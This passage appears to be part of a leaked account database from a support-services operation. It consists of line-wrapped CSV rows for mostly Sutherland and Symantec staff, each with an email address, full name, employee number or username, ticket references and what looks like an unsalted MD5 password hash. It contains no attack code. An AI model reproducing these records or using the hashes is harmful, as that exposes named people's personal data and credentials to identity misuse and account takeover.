33cee4dfc3b00ba6e3016915d7c58,Dubey,<blank>,Avinash_Dubey,Avinash,NULL,NULL,NULL
cc80-457d-835e-3bc4c1128915,CRQ000000248675-VMD-03/05/11,000-000,tools_id@symant
ec.suth.com,Sutherland,f64710a7d3fac52f108322bd7e6e1408,Barinikala,<blank>,11475
5,Anuradha,NULL,NULL,NULL
c25a-4ba6-b4c6-49b5d19ead77,SRB 08.06.2010,INC190024,tools_id@symantec.suth.com,
Sutherland,1ae52151db1fc7bb9a33b359854bb17f,Muppidi,<blank>,094428,Siva Kumar,NU
LL,NULL,NULL
bc97-4886-b2d8-a6f267e09a53,CRQ000000248638-VMD-03/05/11,000-000,tools_id@symant
ec.suth.com,Sutherland,69aaa8147672040dec6a965dd52721f3,Kumar,<blank>,114952,San
tosh,NULL,NULL,NULL
842-4104-b248-5d10923ea3ba,<blank>,<blank>,Basil_Olassa@SUTH.COM,Sutherland,044b
ddfc8491f6d22735bb2d75b722fe,Olassa,<blank>,Basil_Olassa,Basil,NULL,NULL,NULL
4b5-4902-9051-174c31bd6185,<blank>,<blank>,Bernadette_Reyes@symantec.suth.com,Su
therland,686555fed0535d737d7c8ded172f30dd,Reyes,<blank>,Bernadette_Reyes,Bernade
tte,NULL,NULL,NULL
44a-48d4-96f3-1ef78d27ff76,<blank>,<blank>,Bhanutej_T@SUTH.COM,Sutherland,2cfd98
954af4d56f3bc92c035d27bdaa,T,<blank>,Bhanutej_T,BhanuTej,NULL,NULL,NULL
f2e1-44cb-8180-9e33bf27a3df,bpr-08-06-10,EMPROV,mahesh_patil2@symantec.com,Syman
tec,aa57986b8d96ca0a275c2752d6f35375,Patil,<blank>,105285,Mahesh,NULL,NULL,NULL
2e7-4bb8-befe-4e2fc216ce80,<blank>,2630245,Bonnie_Culberson@suth.com,Sutherland,
8038600ca546ca662faeb3dc9354c492,Culberson,<blank>,Bonnie_Culberson,Bonnie,NULL,
NULL,NULL
2d4-4274-8b60-f8eb7fa9afc7,<blank>,<blank>,ArockiaJeyasudhan_T@SUTH.COM,Sutherla
nd,c68501edd0d123ade1850ca3e122c163,T,<blank>,ArockiaJeyasudhan_T,Arockia Jeyasu
dhan,NULL,NULL,NULL
e2b-4b22-bda4-584b21d2e1b2,<blank>,<blank>,Brittany_Corke@suth.com,Sutherland,42
8f3ae5a7d14853c8a3094215ceae70,Corke,<blank>,Brittany_Corke,Brittany,NULL,NULL,N
ULL
cba-420d-9fdb-371d77a6a012,<blank>,<blank>,Brownie_TV@SUTH.COM,Sutherland,ea97d9
67b66675fe0d81ad2d841d500a,T V,<blank>,Brownie_TV,Brownie,NULL,NULL,NULL
cc9-4df5-a9ec-66d6548af542,<blank>,2614953,Byrone_Conoman@SUTH.COM,Sutherland,a1
698392fdd76f3b6a386941d4268169,Conoman,<blank>,Byrone_Conoman,Byrone,NULL,NULL,N
ULL
ba9-4b2f-bb26-21660bd9c842,<blank>,<blank>,CarloRamil_Lakandula@suth.com,Sutherl
and,3910a1622020adf3485b7f0a001756d4,RamilLakandula,<blank>,CarloRamil_Lakandula
,Carlo,NULL,NULL,NULL
cfc-449f-8c32-1fb64ca8f5da,WS 16-07-2010,INC213497,CarmelaMae_Cerezo@SUTH.COM,Su
therland,c347acac59b2dbba3cd87016d32cdaa4,MaeCerezo,<blank>,CarmelaMae_Cerezo,Ca
rmela,NULL,NULL,NULL
5b5-4a3a-8b8b-97085947ca0a,<blank>,<blank>,Carol_Rowlad-Vas@suth.com,Sutherland,
203a59029e66e2492c507c1bfe647191,Rowlad-Vas,<blank>,Carol_RowladVas,Carol,NULL,N
ULL,NULL
9f5-4ef6-b8fe-8cb2bb55414e,WS 16-07-2010,INC213497,CarolA_Sawyer@suth.com,Suther
land,887e0db6f942425c0622771e378d0cae,A Sawyer,<blank>,CarolA_Sawyer,Carol,NULL,
NULL,NULL
b5f-44df-af3a-c4705cb64d05,<blank>,2614953,CecilleJoy_Butardo@SUTH.COM,Sutherlan
d,ad67c009e996735ea2d8c8434ef92b42,JoyButardo,<blank>,CecilleJoy_Butardo,Cecille
,NULL,NULL,NULL
bed-455c-8d18-288e7c536340,<blank>,<blank>,Chandrasekar_MP@SUTH.COM,Sutherland,1
3fc8c2bb9803e6a74251f7a5e4707c5,M P,<blank>,Chandrasekar_MP,Chandrasekar,NULL,NU
LL,NULL
367-4e6f-b901-eca027c8b699,<blank>,<blank>,Charlemagne_Canlas@SUTH.COM,Sutherlan
d,6d3c712d58d4fbfae7f48aecb78f78f9,Canlas,<blank>,Charlemagne_Canlas,Charlemagne
,NULL,NULL,NULL
ca4-4d0a-a55f-7999f0a81d00,<blank>,<blank>,Cherrymae_Salinasal@SUTH.COM,Sutherla
nd,8d3d5e3a54209964a90135a01d1ec88f,BalinoSalinasal,<blank>,Cherrymae_Salinasal,
Cherrymae,NULL,NULL,NULL
245-4413-bf3f-e5254e55a960,<blank>,<blank>,Chinnereth_Prestousa@symantec.suth.co
m,Sutherland,ff9bf26365b94e69dc4638444edc23c3,Prestousa,<blank>,Chinnereth_Prest
ousa,Chinnereth,NULL,NULL,NULL
ab0-4938-8538-91abec05fbdf,<blank>,<blank>,ChristopherRey_Lungay@SUTH.COM,Suther
land,021eab0143417beac2db8f677322b37c,ReyLungay,<blank>,ChristopherRey_Lungay,Ch
ristopher,NULL,NULL,NULL
0f0-4742-9b89-edd322e9fe4d,<blank>,2635069,tools_id@symantec.suth.com,Sutherland
,59bf01b4b267c7656b59badccb08bc96,Rodrigues,<blank>,Clive_Rodrigues,Clive,NULL,N
ULL,NULL
72e4-4e5d-b208-c41503ff3f0b,CRQ000000513235--VMD--19/01/2012,000-000,tools_id@sy
mantec.suth.com,SUTHERLAND,316adf28a80c0f2da766fb6b1b1f261b,Limas,<blank>,123675
,Resty,NULL,NULL,NULL
3e0-41cb-94ad-0424a50dc7fa,<blank>,<blank>,ByronJay_Balagon@SUTH.COM,Sutherland,
f0f3d36dc6dfef752ea5186bfdf823cb,JayBalagon,<blank>,ByronJay_Balagon,Byron,NULL,
NULL,NULL
ab9-499d-814b-54f2341202c2,<blank>,<blank>,CharlesBackiyaraj_A@SUTH.COM,Sutherla
nd,b321e4dbde6b1994a38649f9f1cfda17,A,<blank>,CharlesBackiyaraj_A,Charles Backiy
araj,NULL,NULL,NULL
5591-442a-affa-856595e0383f,CRQ000000513242--VMD--19/01/2012,000-000,tools_id@sy
mantec.suth.com,SUTHERLAND,9d4a5c72a875c5b344f84eac80de8bef,Pototan,<blank>,1236
77,Juvelyn,NULL,NULL,NULL
2ab-4779-8a1e-2d86a5832686,<blank>,<blank>,ChristineJoy_Moncano@SUTH.COM,Sutherl
and,d2c8bb703bdd5ba110694166b1f96011,JoyMoncano,<blank>,ChristineJoy_Moncano,Chr
istine,NULL,NULL,NULL
375-4a3c-95b7-979bc1db943c,<blank>,<blank>,Corazon_Hipolito@SUTH.COM,Sutherland,
e7a8c23aa53c4ed655ea73614522c52a,Hipolito,<blank>,Corazon_Hipolito,Corazon,NULL,
NULL,NULL
14d-4f25-a4b5-930d1b364bd6,<blank>,<blank>,v-6cwri@mssupport.microsoft.com,Suthe
rland,c4f79739abf913e13a555f9d2f45b167,M Wright,<blank>,Cyndi_Wright,Cyndi,NULL,
NULL,NULL
dad-4dd5-a733-69d8561c7759,<blank>,<blank>,tools_id@symantec.suth.com,Sutherland
,4333022c9b668bc27db11e99981de4c7,ArthurPagulong,<blank>,DaveArthur_Pagulong,Dav
e,NULL,NULL,NULL
30ce-4f6e-8820-470eb205d7a7,SRB 27.04.10,EMPROV,tools_id@symantec.suth.com,Suthe
rlands,053c4dc2753eaa3b1a7cbcb9ddbac89a,Daniel,<blank>,104729,Serubabel,NULL,NUL
L,NULL
d1e-4592-8942-8f346bda0f29,<blank>,<blank>,Deepali_Patil@SUTH.COM,Sutherland,aaa
184c14c00e4ac7711fc5ecba7bb9b,Patil,<blank>,Deepali_Patil,Deepali,NULL,NULL,NULL
8cb-4816-91fb-516e8bdb00ec,<blank>,<blank>,Deepika_G@SUTH.COM,Sutherland,a82331b
416e918c255d6302a4506d6b2,G,<blank>,Deepika_G,Deepika,NULL,NULL,NULL
56d-4823-ab86-3b2e9bea927b,<blank>,<blank>,Denny_Varkey@SUTH.COM,Sutherland,a822
2ffcae39568eb32fc2ad426bfdd5,Varkey,<blank>,Denny_Varkey,Denny,NULL,NULL,NULL
d7e-448f-b7c9-08e972f17443,<blank>,<blank>,v-6decu@mssupport.microsoft.com,Suthe
rland,8819eb07b326950b845e3563c9b25eaf,G Curle,<blank>,Derek_Curle,Derek,NULL,NU
LL,NULL
59e-4649-8d7b-a5d4afa5441b,<blank>,<blank>,Deril_Babu@SUTH.COM,Sutherland,a4d5ab
968f2df2bd6fdb6bd1461cc222,Babu,<blank>,Deril_Babu,Deril,NULL,NULL,NULL
15a-4699-b1dd-72d44554d6ff,WS 16-07-2010,INC213497,Dhanasekar_K@SUTH.COM,Sutherl
and,d70fe3d35754b415a0a95d01ce16b6d9,K,<blank>,Dhanasekar_K,Dhanasekar,NULL,NULL
,NULL
8a6e-4ffc-b4be-8253b01858fb,HVK 12/7/09,CRQ000000025211,Billa_Pallavi_Reddy@syma
ntec.com,Symantec,7c0a3dab49ca6b051326251396aa49ab,Pallavi Reddy,<blank>,095226,
Billa,NULL,NULL,NULL
d29-4279-aadf-5456ebc319a5,<blank>,<blank>,Chaithanya_Babu@SUTH.COM,Sutherland,1
537e51b678ee40b513b1ee8848fff4b,Babu,<blank>,Chaithanya_Babu,Chaithanya,NULL,NUL
L,NULL
8d2-484a-ad50-b5aa5633865f,<blank>,<blank>,Charan_TR@SUTH.COM,Sutherland,b43f237
1802142edbec5e446d833236d,T Ramkumar,<blank>,Charan_TR,Charan,NULL,NULL,NULL
e9f-49c5-9109-2b313e1da31a,<blank>,<blank>,CharisseMaeEsguerra_Pinon@SUTH.COM,Su
therland,ec43188a45525e0d35c6fbd5f9914b07,MaePi\xf1on,<blank>,CharisseMaeEsguerr
a_Pinon,Charisse,NULL,NULL,NULL
62c-41fc-b6c7-f8e74b87128c,<blank>,<blank>,Charmy_Rach@SUTH.COM,Sutherland,0d3ec
2fa88f39c8bfe4bd048e34b4aed,Rach,<blank>,Charmy_Rach,Charmy,NULL,NULL,NULL
e06-4097-9d0b-d62484204d95,<blank>,<blank>,Chris_Smith@suth.com,Sutherland,b5155
a74688ad4cc2a2a8b88f23d4449,Smith,<blank>,Chris_Smith,Chris,NULL,NULL,NULL
71b-49b4-8cb5-7ddf6c081ec9,<blank>,<blank>,ChristineRae_Inguillo@SUTH.COM,Suther
land,5e4e6c44f48838444dfa8d483fc8f7ab,BolcanInguillo,<blank>,ChristineRae_Inguil
lo,ChristineRae,NULL,NULL,NULL
9aae-4763-86ff-02c940377f09,27/01/2010 - SPJ,EMPROV,symaccount@ipcdoctor.co.kr,P
C Doctor,d0301596830749766c0a5ca48dd0389b,Yamazaki,<blank>,098876,Satoko,NULL,NU
LL,NULL
76a-4761-a349-62fedd5b2b2b,<blank>,<blank>,csajith@suth.com,Sutherland,9eca695bf
2efbdef5434af2f8133228a,Chalakandi,<blank>,csajith,Ajith,NULL,NULL,NULL
f01-4dd5-895c-0be55b03a1cd,<blank>,<blank>,DanicaRona_Mantos@SUTH.COM,Sutherland
,fd0517ed20cd71526fae0cf23123fe55,RamosMantos,<blank>,DanicaRona_Mantos,DanicaRo
na,NULL,NULL,NULL
c22b-478b-8f4b-0c4a65debcd9,28/01/2010-SPJ,EMPROV,Tools_Id@Symantec.Suth.com,Sut
herland,9505cfcbe1e5f1bd2e892d501cdd22c1,Patwa,<blank>,093902,Raj,NULL,NULL,NULL
1fc-468a-8fa1-3aa8b6d33519,<blank>,<blank>,DasarathSagar_M@SUTH.COM,Sutherland,e
3eb2dd8995cc36c76ad9e95054122e5,M,<blank>,DasarathSagar_M,Dasarath Sagar,NULL,NU
LL,NULL
b3d-49c0-bcee-778c44caae58,<blank>,<blank>,David_McKinnon@SUTH.COM,Sutherland,3d
bb5e2e06a91cdf2989657678872240,McKinnon,<blank>,David_McKinnon,David,NULL,NULL,N
ULL
4d7-4695-8477-7cf43cc4a1bb,<blank>,<blank>,David_Rajamohan@SUTH.COM,Sutherland,3
5f2c69b07f7f472be516e8d605974df,Rajamohan,<blank>,David_Rajamohan,David,NULL,NUL
L,NULL
d9f-4382-b5a1-40b635a23670,<blank>,2630245,DavidL_Moss@SUTH.COM,Sutherland,a4828
73553ac35407483a51b7169acd6,L Moss,<blank>,DavidL_Moss,David,NULL,NULL,NULL
6c3-4ea5-b684-e2591f69f2f3,<blank>,076294,Tools_id@symantec.suth.com,Sutherland,
456b2cbfaac4a7608136d82f6da3b0c0,W Leader,<blank>,DavidW_Leader,David,NULL,NULL,
NULL
a68-44e4-bd50-8d57d12fe594,<blank>,<blank>,Dawar_Sayyed@SUTH.COM,Sutherland,deb8
2d880c3d659e14780b5c9ddf1a97,Sayyed,<blank>,Dawar_Sayyed,Dawar,NULL,NULL,NULL
06f-43ff-b93e-9c7ec55a4253,<blank>,<blank>,Debasish_Panigrahi@SUTH.COM,Sutherlan
d,3df86b9b9644d1b14940a12492b27670,Panigrahi,<blank>,Debasish_Panigrahi,Debasish
,NULL,NULL,NULL
d5ed-4746-90d3-cac683730d7f,<blank>,SH 22/10/2010,accounts@symantec.teleperforma
nce.gr,<blank>,a11cf1955dbf1460905464b417db0f63,Schaal,<blank>,106240,Alexandre,
NULL,NULL,NULL
480-466b-a719-3ea260960fa8,<blank>,<blank>,Deepak_Nambittiyath@suth.com,Sutherla
nd,a1cb9c97c022d596829086007e8ff4a6,Nambittiyath,<blank>,Deepak_Nambittiyath,Dee
pak,NULL,NULL,NULL
4e4b-446a-aa0c-59eb4cde138b,<blank>,SH 22/10/2010,tools_id@symantec.suth.com,<bl
ank>,7e07e7c927cca245e4e4e8756f156ceb,Gyan Chand,<blank>,092536,Navitha,NULL,NUL
L,NULL
de9-4997-a9ce-4aa64ec0546a,<blank>,<blank>,Deepak_Sasidharan@SUTH.COM,Sutherland
,5bdb639579611190cee1e70afb4c982a,Sasidharan,<blank>,Deepak_Sasidharan,Deepak,NU
LL,NULL,NULL
be2-419a-b5c3-fab5a189c84b,<blank>,<blank>,Denea_MacNiven@suth.com,Sutherland,aa
d28fed36c7816408d1e74d8dbe1000,MacNiven,<blank>,Denea_MacNiven,Denea,NULL,NULL,N
ULL
06f2-4b0a-81dc-155f6f4748c3,04/06/2010 - SPJ,EMPROV,Tools_ID@Symantec.Suth.Com,S
utherland,c7dee099aa683e8cbe386e985e13ab1a,DKothari,<blank>,105695,Jimmy,NULL,NU
LL,NULL
db0-4024-858d-94af1bb02829,<blank>,<blank>,Dilin_J@SUTH.COM,Sutherland,09ddb066b
d8399e9de21d7fbb7f81819,J,<blank>,Dilin_J,Dilin,NULL,NULL,NULL
cef-4fa1-97fa-00758e16800c,<blank>,2630245,DouglasL_Patterson@suth.com,Sutherlan
d,69049b58b8d52e7e3384a00fd1537029,L Patterson,<blank>,DouglasL_Patterson,Dougla
s,NULL,NULL,NULL
3fb-4f06-bbc9-58efd2312d6d,<blank>,<blank>,Earl_Llanera@SUTH.COM,Sutherland,0800
009e6e91f27e005d664ece9a74fe,NormanLlanera,<blank>,Earl_Llanera,Earl,NULL,NULL,N
ULL
b44-4e13-9200-41ef680b8bfc,WS 19-07-2010,INC213497,EllenGrace_Albaran@SUTH.COM,S
utherland,2744963e4d437ddeed47b0b25afd4a15,Bitacura,<blank>,EllenGrace_Albaran,E
lizabeth,NULL,NULL,NULL
9ae-4bfa-beda-aec75a0cc3c8,WS 19-07-2010,INC213497,Erwin_Napagao@SUTH.COM,Suther
land,55cc4a4858d9c9c715d0ebbe986bc89a,Napagao,<blank>,Erwin_Napagao,Erwin,NULL,N
ULL,NULL
fab-4838-b93e-781ba6e700b5,<blank>,<blank>,Daniel_Patel@SUTH.COM,Sutherland,3907
c126c0c3d215627e43316311371a,Patel,<blank>,Daniel_Patel,Daniel,NULL,NULL,NULL
b81-4a2e-b648-652d76c63f69,<blank>,<blank>,Dhanya_Menon@SUTH.COM,Sutherland,23e1
837e236a5e0dcbcdaf9826d2e82f,Menon,<blank>,Dhanya_Menon,Dhanya,NULL,NULL,NULL
32b-436e-8f82-56b1992f3649,<blank>,<blank>,Dharmendra_Jaiswal@SUTH.COM,Sutherlan
d,fbbda9d0820f7b3f03fc04971cf1ba7f,Jaiswal,<blank>,Dharmendra_Jaiswal,Dharmendra
,NULL,NULL,NULL
f1c2-4c08-a438-898f7a9cfc8a,CRQ000000227490-KD-28-03-2011,000-000,tools_id@syman
tec.suth.com,Sutherland,b9cc5c4f65a20a222a188ee82bbe0939,Vignesh,<blank>,114198,
William,NULL,NULL,NULL
e75-4216-868b-2955a0b6e2a9,<blank>,<blank>,Farheen_Ahmed@SUTH.COM,Sutherland,3c3
a0abd509821feb783aa971f0e96bb,Ahmed,<blank>,Farheen_Ahmed,Farheen,NULL,NULL,NULL
7ade-43e8-ba63-1ae21f04270f,CRQ000000228849,<blank>,tools_id@symantec.suth.com,K
SC-03/29/2011,afa1326dac61953ef9819fc972ef31eb,Balakrishnan,<blank>,109210,Janan
i,NULL,NULL,NULL
16c-42ea-9d58-3f4af0fc5c34,<blank>,2633282,tools_id@symantec.suth.com,Sutherland
,0b794f72b3293f55c6f54b768242c97b,Varella,<blank>,Franco_Varella,Franco,NULL,NUL
L,NULL
3d2d-4163-be23-8f026f5d7d79,SRB 19.05.2010,EMPROV,Symaccount@neusoft.com,Neusoft
,1259714df938936786550183085244b9,Gong,<blank>,104689,Xue,NULL,NULL,NULL
426-4963-bce9-574df1caea7b,<blank>,<blank>,Ganesh_S3@SUTH.COM,Sutherland,fd3d174
485dbdacef5ab71ceaa9d7ab5,S,<blank>,Ganesh_S3,Ganesh,NULL,NULL,NULL
366-4b66-a113-1eb43acb9072,<blank>,<blank>,GaudethaBebs_DelosReyes@SUTH.COM,Suth
erland,ae0c32abb2717b586000f46ca40f2785,Monteverde Delos Reyes,<blank>,GaudethaB
ebs_DelosReyes,Gaudetha Bebs Monteverde,NULL,NULL,NULL
ea58-4b16-a425-303a7f22ef2f,CRQ000000228849,<blank>,tools_id@symantec.suth.com,K
SC-03/29/2011,1a882181b5a04d812c71d1f37ea4a725,Chandran,<blank>,101187,Jithin,NU
LL,NULL,NULL
9ad-4a7c-af1a-249d1104197b,<blank>,<blank>,Gayathri_K3@SUTH.COM,Sutherland,dc6b4
c2db9d32b5dd28b09ffa9fe1a85,K,<blank>,Gayathri_K3,Gayathri,NULL,NULL,NULL
129-4dfc-88ac-578dd8da7659,<blank>,<blank>,Georell_Calub@SUTH.COM,Sutherland,2b2
3381aa955636de88d620f6df0ca20,Calub,<blank>,Georell_Calub,Georell,NULL,NULL,NULL
0ef5-47b1-823b-bfbac334dfcc,INC213497,nam 07/13/2010,tools_id@symantec.suth.com,
Sutherland,1c29662fd73058beeeacbee794572d7d,Parmar,<blank>,102086,JayeshJagdish,
NULL,NULL,NULL
d6c-4ab6-a092-b26b16cbaf95,<blank>,<blank>,Girish_R@SUTH.COM,Sutherland,78946465
13731789819db14d6e8958bc,R,<blank>,Girish_R,Girish,NULL,NULL,NULL
e9e-416e-b935-1cf0a8a5fa21,<blank>,<blank>,Gopal_Jindgar@SUTH.COM,Sutherland,484
3c19f0a87c1d6546ad1b673fdebfe,Jindgar,<blank>,Gopal_Jindgar,Gopal,NULL,NULL,NULL
463-487d-b1eb-dac02b938e02,<blank>,<blank>,v-6gore@mssupport.microsoft.com,Suthe
rland,d7a229f9ca0d1e0b2956a569421f1913,Relph,<blank>,Gourdon_Relph,Gordon,NULL,N
ULL,NULL
47e5-4596-9dfd-25188454a025,WS 27-08-2010,INC000000251655,tools_id@symantec.suth
.com,<blank>,82fd0520213dfc8d0a5c5ff3b881ca45,Santh M,<blank>,092501,Bemal,NULL,
NULL,NULL
276f-47d4-80cd-7b9d8ed8863c,SRB 27.08.2010,INC000000251655,tools_id@symantec.sut
h.com,Sutherland,e71c26e80a236ea2d3c5c950827a2aa9,Raghupatruni,<blank>,099914,Na
gendra,NULL,NULL,NULL
ddd-49a5-b5a4-3ddd24e24dee,<blank>,<blank>,Elton_DeCruz@SUTH.COM,Sutherland,7760
f690d0fedc5f54b4eda713a96678,De Cruz,<blank>,Elton_DeCruz,Elton,NULL,NULL,NULL
5a5-4b81-b9e9-94172cdc2d92,<blank>,<blank>,Eric_Cameron@SUTH.com,Sutherland,de03
9f751636902f02d1e81366887009,Cameron,<blank>,Eric_Cameron,Eric,NULL,NULL,NULL
2f18-4bd2-b9d5-8e722efffee4,RM-10feb 2012-CRQ000000551706,<blank>,tools_id@syman
tec.suth.com,Sutherland,71b2b21216ef1e104a03aa40ac94aa3d,Nazir Shaikh,<blank>,12
4793,Parvez ,NULL,NULL,NULL
7bbc-4748-bd8c-af4282accc16,<blank>,<blank>,tools_id@symantec.suth.com,RM-Feb 24
2012-CRQ000000568695,bc11310438fcb014cef0eeef86d603fa,Tolentino Diego,<blank>,1
25293,Justin,NULL,NULL,NULL
0aa-4bd1-a0aa-e59855d2a6e2,<blank>,<blank>,Gavin_Augustine@SUTH.COM,Sutherland,0
23d0fa005f46ea99e9290d0eee5be23,Augustine,<blank>,Gavin_Augustine,Gavin,NULL,NUL
L,NULL
eea1-439f-aa7a-20fe04922496,"CRQ000000588322 CLNP Mar 12, 2012",000-0000,tools_i
d@symantec.suth.com,Sutherland,65906f1ecbecea075133e132beaff59b,ManjaliRhee,<bla
nk>,101536,Reshma,NULL,NULL,NULL
34f-4357-a1b9-193bbc3c2e97,<blank>,<blank>,Gopiraj_P@SUTH.COM,Sutherland,0efeffe
7ccb56ce62f06bb851bb1ae75,Premkumar,<blank>,Gopiraj_P,Gopiraj,NULL,NULL,NULL
41e-4754-a46f-802b848a6052,<blank>,<blank>,GopiVishnu_Kanchi@SUTH.COM,Sutherland
,7f4bb3d96c9b109b6da8c350b9862215,Kanchi,<blank>,GopiVishnu_Kanchi,Gopi Vishnu,N
ULL,NULL,NULL
45c-4180-9590-5cf64c2fccbc,<blank>,2632350,tools_id@symantec.suth.com,Sutherland
,d0864a16c7583b99014d6ca592bf7015,Duraiswamy,<blank>,GovindaArun_D,Govinda Arun,
NULL,NULL,NULL
c080-4157-ab31-0dc3b4a1f50e,<blank>,<blank>,tools_id@symantec.suth.com,PM - 3/14
/2012 - REQ000001305684,fbfeb04d25c37ee019012ff3a3dc58bf,Thakkar,<blank>,222451,
Alpesh,NULL,NULL,NULL
9b81-49f2-84ec-3b2fec1cb775,<blank>,<blank>,tools_id@symantec.suth.com,PM - 3/14
/2012 - REQ000001305691,f479ce30986802e51e608ebff61d737b,Coelho,<blank>,222453,M
elroy,NULL,NULL,NULL
7da-49ef-bba0-010a66154347,<blank>,<blank>,GuyTidalgo_Enano@SUTH.COM,Sutherland,
b2a6cfc18dd8372a5ca97e745cefd54c,TidalgoEna\xf1o,<blank>,GuyTidalgo_Enano,Guy,NU
LL,NULL,NULL
e2f-4a5f-ad79-85aa254c9885,<blank>,2632350,tools_id@symantec.suth.com,Sutherland
,292db491ac379f863a6b0af6f322fa39,Subramanian,<blank>,HariHaraSudhan_S,Hari Hara
Sudhan,NULL,NULL,NULL
985-4172-9a8c-0696cfa02485,<blank>,<blank>,Harini_R2@SUTH.COM,Sutherland,d1ce6a7
aeca421cfe7a46fa1e9bebaab,R,<blank>,Harini_R2,Harini,NULL,NULL,NULL
fb9-43c9-a582-2216321715ff,<blank>,<blank>,Harold_Hufana@SUTH.COM,Sutherland,ea2
4d8fee752fd6d720d0698a721c1ee,Hufana,<blank>,Harold_Hufana,Harold,NULL,NULL,NULL
e411-462c-b00a-08e93dce1e1e,<blank>,<blank>,tools_id@symantec.suth.com,PM - 10/4
/2011 - CRQ000000349498,8d3c639aebfc67b92ee13085772829c6,Mohamed yusuf,<blank>,0
75657,Mohamed Ismail,NULL,NULL,NULL
293a-49bb-a6ec-b035ef14af10,<blank>,<blank>,tools_id@symantec.suth.com,RM-21Dec-
2011-CRQ000000464923,37b5ffb6320519d78b3ae7743306221b,Belarmino,<blank>,123259,R
onald Joseph Pati\xf1o,NULL,NULL,NULL
aebc-422c-9369-dae86941328f,CRQ000000349498 SP OCT 4 2011,000-0000,tools_id@syma
ntec.suth.com,Sutherland,2ffafd3b74a48aac245e022d16229338,Reyes,<blank>,111739,J
ofel Ebon Jenen,NULL,NULL,NULL
3b13-4342-8d67-3098faebde13,INC213497,nam 07/16/2010,tools_id@symantec.suth.com,
Sutherland,ba1e09823122ce6df2ae40b2a52767a4,Champanerkar,<blank>,075792,Swapnil,
NULL,NULL,NULL
fad-4b55-9605-6223a41e2261,<blank>,<blank>,Jayaseelan_L.W@SUTH.COM,Sutherland,f9
4961363fb270821092d8a13a401fd9,L.W,<blank>,Jayaseelan_LW,Jayaseelan,NULL,NULL,NU
LL
eca-4457-9a54-4471bd481f1f,<blank>,<blank>,John_Slezak@symantec.com,Symantec,f95
587b82c8d114da27624e902939e2f,Slezak,<blank>,john_slezak,John,NULL,NULL,NULL
0ff1-46eb-be78-f9263c271109,CRQ000000349498 SP OCT 4 2011,000-0000,tools_id@syma
ntec.suth.com,Sutherland,291f622491d5c4e7cbd69a1e3ad7f14e,Cuyos,<blank>,075506,J
anet,NULL,NULL,NULL
fd1-4de8-b1b0-4527794c1a1c,<blank>,<blank>,Jeevan_Jerome@SUTH.COM,Sutherland,c32
6a9737e25e65c29d7c1dc7caf5b11,Jerome,<blank>,Jeevan_Jerome,Jeevan,NULL,NULL,NULL
30a-4502-8c34-8a913a9ab6fa,<blank>,<blank>,Jeevan_Prasanth@SUTH.COM,Sutherland,f
5242aedc4aeba62a40a86b548cd09dc,Prasanth,<blank>,Jeevan_Prasanth,Jeevan,NULL,NUL
L,NULL
54f-4bb9-8173-e44daa160bf7,<blank>,<blank>,JefferyR_White@SUTH.COM,Sutherland,4c
20448f8183c72bdb9a1436ca895db9,White,<blank>,JefferyR_White,Jeffery,NULL,NULL,NU
LL
53c-4b0e-917d-3810a5016e71,<blank>,<blank>,Jennifer_Juson@SUTH.COM,Sutherland,b2
36706f10348762b25da1f89808c590,Juson,<blank>,Jennifer_Juson,Jennifer,NULL,NULL,N
ULL
a711-47ce-970a-1e08d5da58e2,"CRQ000000830055 CLNP Oct 08,2012",000-0000,jimpatri
ck_pascua@symantec.com,Symantec,8ae797c50f038be5d24d97371b45c6f9,Pascua,<blank>,
230604,Jim Patrick,NULL,NULL,NULL
d8bb-4a82-bb24-c7903cdca004,<blank>,<blank>,tools_id@symantec.suth.com,CRQ000000
208234 - PR - 2/25/2011,15cd0fdd0de1c9823b17efc1124941d5,Raj B,<blank>,113396,Jo
hnson Samuel,NULL,NULL,NULL
ac80-4139-a196-d3de7d3616ca,CRQ000000349498-CLNP-04/10/2011,000-0000,tools_id@sy
mantec.suth.com,Sutherland,37fa043b972bd316ae317d9027e96fb0,Das A,<blank>,075652
,Hari,NULL,NULL,NULL
6e9-4cba-83e6-1196e23b7219,<blank>,<blank>,Jeremias_Gonzales@SUTH.COM,Sutherland
,81fa19332789d92279b74b5b3c9c8fd4,Gonzales,<blank>,Jeremias_Gonzales,Jeremias,NU
LL,NULL,NULL
3ec-4035-9f8d-19f1e638980e,<blank>,2630245,JesseT_Kertesz@SUTH.COM,Sutherland,43
7b028abf365f585bcb6d43f3dff241,T Kertesz,<blank>,JesseT_Kertesz,Jesse,NULL,NULL,
NULL
22ca-4dc2-a87d-4172cb0228ef,CRQ000000274382--vmd--10/06/2011,000-000,tools_id@sy
mantec.suth.com,Sutherland,780fbb874292dc7fad6eff1524e47f54,Villegas,<blank>,117
034,Rowena,NULL,NULL,NULL
091-4b0a-a686-a8bedb3f7a97,<blank>,<blank>,Jewel_Pidor@SUTH.COM,Sutherland,8cfd5
30cdd72802e57c6098a68b65aeb,Pidor,<blank>,Jewel_Pidor,Jewel,NULL,NULL,NULL
daf2-4df3-9a45-b892e3bd5d09,30/12/2009 - SPJ,EMPROV,Symantec_TL@teleperformance.
se,TPN,0a8faaf0ccbfd850401cca8734854cba,Olsson,<blank>,097990,Tommy,NULL,NULL,NU
LL
02d-4f4b-b56c-86729ffc9b4f,<blank>,<blank>,0@Suth.com,Sutherland,f5c089e2d98ca76
18b0379ccc9266a8c,Quides,<blank>,Jibb_Quedes,Jibb,NULL,NULL,NULL
2f61-4638-9db9-f1907b5ebd9d,"CRQ000000669897 CLNP May 23,2012",000-000-0000,tool
s_id@symantec.suth.com,Sutherland,a769d03d57efc492ef0606845a8352c3,Ambere,<blank
>,225906,Abhijt,NULL,NULL,NULL
039-436c-a9a4-478b67dcc767,<blank>,<blank>,Jill_Hernandez@Suth.com,Sutherland,c0
0a0190b4ab497ab491a42b8141742b,Hernandez,<blank>,Jill_Hernandez,Jill,NULL,NULL,N
ULL
4211-4cdc-8778-cf22e0362ac3,WS 27-08-2010,INC000000251655,tools_id@symantec.suth
.com,<blank>,15056f88fdcc3d09b88e97e099e1a7e7,Swamy,<blank>,093645,N Sarat Kumar
,NULL,NULL,NULL
e63-4f1b-9d71-55a5f8837515,<blank>,<blank>,JitenP_Dolia@SUTH.COM,Sutherland,7bdc
34432f904738a3d3d83ef755a4d1,Dolia,<blank>,JitenP_Dolia,Jiten P,NULL,NULL,NULL
e96-422f-81e3-e6090310b03e,<blank>,<blank>,JoanMelody_Emplamado@SUTH.COM,Sutherl
and,b8ad867dded9d79173940f64257be669,MelodyEmplamado,<blank>,JoanMelody_Emplamad
o,Joan,NULL,NULL,NULL
854-448b-abf1-df716d27ec1c,<blank>,<blank>,Jobin_Varghese@SUTH.COM,Sutherland,ef
